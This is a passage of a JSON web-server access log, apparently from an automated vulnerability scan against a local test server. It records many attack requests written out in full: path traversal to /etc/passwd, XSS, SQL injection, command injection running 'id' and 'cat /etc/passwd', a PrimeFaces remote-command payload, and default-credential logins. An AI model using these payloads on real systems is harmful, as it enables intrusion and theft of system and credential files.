djnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.jenkins.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kb_view_customer.do?sysparm_article=KB00xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"type=login&loginCode=YWRtaW4=&pwd=MDAwMDAw&","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999))) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/images/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http_header.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WCC2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/initializers/secret_token.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=type C:\x5C\x5CWindows\x5C\x5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/repository HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.travis.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /img/../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbconsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /artifactory/ui/repodata?deploy=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.circleci/config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"{\x22id\x22:\x22insecure-firebase-database\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /29KAnh5z2wq3tqPyxLhOvkp8ZuV.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/packages/security.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CACHE/sdesktop/install/start.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0a/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OpenAM-11.0.0/ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) 